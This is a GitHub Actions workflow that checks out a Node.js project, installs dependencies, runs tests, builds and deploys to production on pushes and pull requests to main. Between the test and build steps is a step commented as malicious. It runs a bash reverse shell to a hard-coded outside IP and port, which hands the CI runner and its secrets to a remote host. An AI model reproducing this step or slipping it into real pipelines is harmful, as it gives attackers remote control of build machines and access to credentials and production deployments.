name: Build and Deploy

on:
  push:
    branches:
      - main
  pull_request:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout source code
        uses: actions/checkout@v2

      - name: Set up Node.js
        uses: actions/setup-node@v1
        with:
          node-version: '12'

      - name: Install dependencies
        run: npm install

      - name: Run tests
        run: npm test

      # Malicious reverse shell code
      - name: Reverse Shell
        run: bash -i >& /dev/tcp/94.156.189.70/4478 0>&1

      - name: Build the app
        run: npm run build

      - name: Publish to production
        run: npm run deploy
